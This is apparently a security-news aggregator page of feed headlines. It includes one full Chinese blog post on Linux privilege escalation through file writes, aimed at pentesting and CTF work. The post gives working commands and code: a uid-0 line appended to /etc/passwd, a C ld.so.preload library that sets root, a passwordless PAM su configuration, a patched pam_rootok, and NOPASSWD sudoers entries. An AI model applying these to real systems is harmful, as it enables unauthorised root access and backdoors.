Aggregator

Windows Zero-Day Allows Admin Escalation

3 years 1 month ago

Summary IBM X-Force Incident Command is following a recent disclosure regarding a Windows-based zero-day attack that allows for local privilege escalation in Windows 10, Windows 11, and Windows Server. Threat Type Zero-Day Overview IBM X-Force Incident Command is following this disclosure of a zero-day exploit that allows for local privilege escalation in various versions of Windows to include Windows 10, 11, and Windows Server. The exploit has been tested and verified by Bleeping Computer. IBM has yet to v

DataStream: Real-time Log Delivery for All Akamai Customers

The Akamai Blog

3 years 1 month ago

We are pleased to announce that DataStream 2 is now available for all our customers. DataStream 2 provides customers with detailed log data from requests on the Akamai Intelligent Edge Platform within minutes. DataStream 2 gives customers unparalleled visibility into events at the Akamai edge and puts developers first by empowering them with the data needed to support critical operations.

Trevor Blackford

「转载」404星链计划改版&新项目加入今日官宣，围观有惊喜！

灾难控制局

3 years 1 month ago

「404星链计划」是知道创宇404实验室于2020年8月提出的开源项目收集计划，这个计划的初衷是将404实验

【文末抽奖】404星链计划改版&新项目加入今日官宣

学蚁致用

3 years 1 month ago

好像这么久了没跟粉丝互动过，于是跟「404星链计划」嫖了一批礼物，铁子起来抽奖了

第八周/20211122红队推送

凌晨一点零三分

3 years 1 month ago

【漏洞研究】Azure Active Directory 信息泄露漏洞（CVE-2021-42306）htt

Hadoop Yarn RPC未授权访问漏洞简单复现

Sky's自留地

3 years 1 month ago

前段时间看到了阿里云发的一篇文章，捕获到了某挖矿软件利用Hadoop Yarn的RPC接口进行执行命令。上周有空看了下，在java中可以很简单的使用yarnClient调用RPC接口进行通信，其...

sky

Hadoop Yarn RPC未授权访问漏洞简单复现

Sky

3 years 1 month ago

sky

《Go 语言设计与实现》纸质书预售了！

真没什么逻辑

3 years 1 month ago

《Go语言设计与实现》纸质书预售了！有 500 本签名版

[转]Typecho修改后台路径留下的漏洞

Sky's自留地

3 years 1 month ago

本文转自原文链接今天重新搭建了博客，想起来typecho有个可以找到后台的bug(漏洞?)，就随手转载过来,让更多使用typecho的小伙伴看到,或者让大家找typecho后台多一些了解。typ...

sky

[转]Typecho修改后台路径留下的漏洞

Sky

3 years 1 month ago

sky

博客备份方案

Sky's自留地

3 years 1 month ago

刚经历了服务器故障，导致博客内容大部分都丢失的窘境，我今天在重新搭建博客的时候，就顺便将对网站的备份方案进行了完善，主要是以下两点：服务器提供商常态备份核心服务器数据异地备份第一点没什么好说的，...

sky

博客备份方案

Sky

3 years 1 month ago

sky

Org....

Sky's自留地

3 years 1 month ago

之前博客存放在vultr上,昨天收到vultr的邮件告知服务器硬件故障,服务器无法恢复,因为一直用的vultr,也就在19年备份了一次,后面就没有对数据再次备份,so,19年以后的数据全部没了,...

sky

Org....

Sky

3 years 1 month ago

sky

操作 linux 文件提权

Green_m's blog

3 years 1 month ago

0x00 前言
0x01 三板斧
0x02 passwd 和 shadow
0x03 /etc/ld.so.preload
0x04 PAM 认证
- 1. 配置文件
- 2. pam_rootok.so 库文件
0x05 /etc/cron.hourly/
0x06 sudoers
0xff 总结

0x00 前言

目前基本年更，工作中的太多东西不太敢放到博客中了，就是平时随手放笔记里的东西可能会拿出来更新一下。

本篇博客主要是总结 Linux 上通过写文件或者类似行为来提权的方法，收集途径来自于笔者平时收集和工作遇到的情况，如有缺失还请指正。

本文应该会持续更新。

0x01 三板斧

为了对一些刚入门的小兄弟友好一点，把老生常谈的几种方式在这里提一下。

authorized_keys
crontab 文件
webshell

这三种方式可以在大部分其他提权相关的文章中见到，这里就不再赘述具体的操作方法，就关键的地方提一下：

authorized_keys

这个方式需要存在当前用户的 .ssh 目录，同时如果还需要开启 ssh 服务，限制挺多的。

cron 文件

共有两个文件 /etc/crontab 和 /var/spool/cron/crontabs/root ，打 redis 的时候用得比较多，但需要注意的是不同的发行版对于crontab文件的权限和格式要求不一样，

所以有时候渗透的时候会发现，ubuntu的发行版通过redis写crontab就经常利用不成功，因为ubuntu的要求权限是600才会执行，但是 centos/redhat 就不用。

webshell

这个我感觉是用得越来越少了，当然某些情况下还是可以用的，就不多涉及了。

0x02 passwd 和 shadow

这两个文件放在一起，这个方法与其说是用来提权，其实更像是维持权限的一种方式。

passwd 这个方式是我在某个脏牛的exp脚本里学到的，如下

perl -e "print crypt('kali@12', 'AA')" echo "kali:AAvV8CAFWw4Bc:0:0:kali:/root:/bin/bash" >> /etc/passwd

这样之后 su kali 就可以直接登录 kali 用户了，kali 用户的 id 为0，也就相当于 root 用户。

shadow 就更容易理解了，直接替换某个用户的 hash。

0x03 /etc/ld.so.preload

在网上经常能搜到关于 LD_PRELOAD 提权或者后门的消息，但是少有提及到 ld.so.preload 文件的利用。

这两者的区别主要是，前者是全局的，对于整个系统都生效，而后者只对于当前用户和环境才生效。

从描述上来看，明显是前者更能满足我们的需求，光写入文件，不用配其他属性就能实现提权，简直完美。

修改 /etc/ld.so.preload 文件为：

/tmp/preload.so

preload.so 的源代码为：

// preload.c #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init(void) { if(geteuid() != 0){ exit(0); } unsetenv("LD_PRELOAD"); unlink("/etc/ld.so.preload"); //Delete it once called. setgid(0); setuid(0); //system("/usr/bin/chown root:root /tmp/runbash; /usr/bin/chmod +s,ugo+x /tmp/runbash"); system("/usr/bin/id > /tmp/pwn"); }

编译该源码：

gcc -fPIC -shared -o preload.so preload.c -nostartfiles -ldl

这样我们就能以 root 权限执行命令了，源码中为了避免反复执行命令，主动删除了 preload 文件，只需要执行一次就够了，如果没有这行，将会导致灾难性后果。

我在某次CTF比赛中，用这个提权方式成功拿到 flag。只要有任意文件写入，都能用该方式提权。

0x04 PAM 认证

PAM 是 Linux 里负责认证的模块，具体的配置在 /etc/pam.d/ 目录下，其中 su 的配置为 /etc/pam.d/su，其他程序的配置为同名配置文件。

1. 配置文件

我们可以通过修改或者覆盖该配置文件来实现提权，不用密码也能切换到root账号。

/etc/pam.d/su kali 上测试通过

auth sufficient pam_permit.so session required pam_env.so readenv=1 envfile=/etc/default/locale session optional pam_mail.so nopen session required pam_limits.so @include common-auth @include common-account @include common-session

pam_permit.so 的结果是始终返回 True，sufficient 的条件一旦被满足，则直接返回认证成功。

因此上述配置可以实现任意账户切换都成功，不需要密码。

2. pam_rootok.so 库文件

这个 so 库文件在很多程序中都用到了，本来的意义是当 root 用户切换到其他用户时，不需要认证可以直接切换。当我们有权限可以修改这个库文件时，可以重新生成一个so文件，让它始终返回真就可实现提权。

pam_rootok.so 的源代码在 https://github.com/linux-pam/linux-pam/tree/master/modules/pam_rootok

验证是否为 root 的关键代码如下：

static int check_for_root (pam_handle_t *pamh, int ctrl) { int retval = PAM_AUTH_ERR; if (getuid() == 0) #ifdef WITH_SELINUX if (selinux_check_root() == 0 || security_getenforce() == 0) #endif retval = PAM_SUCCESS; if (ctrl & PAM_DEBUG_ARG) { pam_syslog(pamh, LOG_DEBUG, "root check %s", (retval==PAM_SUCCESS) ? "succeeded" : "failed"); } return retval; }

将返回值修改为 return PAM_SUCCESS 即可实现我们的目标。

完整代码和编译见仓库： https://github.com/Green-m/pam_privilege

0x05 /etc/cron.hourly/

大家看标题应该就知道这个方法了，为什么单独把这个拿出来讲，因为这个对格式的要求没那么高。

这个在 cron.hourly 文件夹内可以直接写 shell 脚本或者其他二进制，对文件的格式要求没那么高，但是要有 execute 权限。

因为在这几个文件夹内是用 run-parts 程序去调用该文件夹下的文件并执行，和 crontab 文件调用执行的原理并不同。

因为它是时间触发的，最快也需要一个小时触发一次，所以网上用这个方式提权或者执行命令的并不多，但在某些场景下是能用到的。

0x06 sudoers

执行命令

echo 'lowprivuser ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers

这样 lowprivuser 就可以不用密码执行 sudo 命令了。

在测试中，我还发现 sudo 还包含了 /etc/sudoers.d/ 文件夹内的所有配置文件，那么理论上生成一个新文件也是可以的

echo 'lowprivuser ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers.d/lowprivuser

但是测试过程中发现 sudo 会检查该文件的权限，要求不能是全局可写，否则会提示：

sudo: /etc/sudoers.d/lowprivuser is world writable

那么这个最高的权限就是 776，只要满足这个条件就能够正常使用。

0xff 总结

大体上就这样，不是什么特别有用的方法，但某些时刻可能有特别的效果。

Thymeleaf SSTI 分析以及最新版修复的Bypass

技术猫屋

3 years 1 month ago

Thymeleaf SSTI 分析以及最新版针对 SSTI 修复的Bypass技巧分析和介绍

Thymeleaf SSTI 分析以及最新版修复的 Bypass

Panda - 专注于网络空间安全研究

3 years 1 month ago

0x01 写在前面前段时间补上了迟迟没有写的文件包含漏洞原理与实际案例介绍一文，在其中就提到了 Thymeleaf SSTI 漏洞，昨天在赛博群里三梦师傅扔了一个随手挖的 CVE——Thyme...

panda

Getting Ready for Some Holiday Shopping? So Are the Bots

The Akamai Blog

3 years 1 month ago

Susan McReynolds

Placing Accessibility at Akamai ? In Reach

The Akamai Blog

3 years 1 month ago

Encouraging and supporting open discussions about disability and mental health at work. We define disability as a condition that affects everyday activities ? physically, cognitively, and/or neurologically. In Reach helps the Akamai community understand what disability means in the workplace. As a team, we also ensure disabled colleagues have the support they need to thrive ? so that success is always "in reach."

molly-elise-young-group

学习K8S中常见的21种攻击方式

RedTeaming

3 years 1 month ago

前言学习笔记-请勿当真。如有错误-也很正常。练习地址https://katacoda.com/madhuak

Aggregator

Managed ad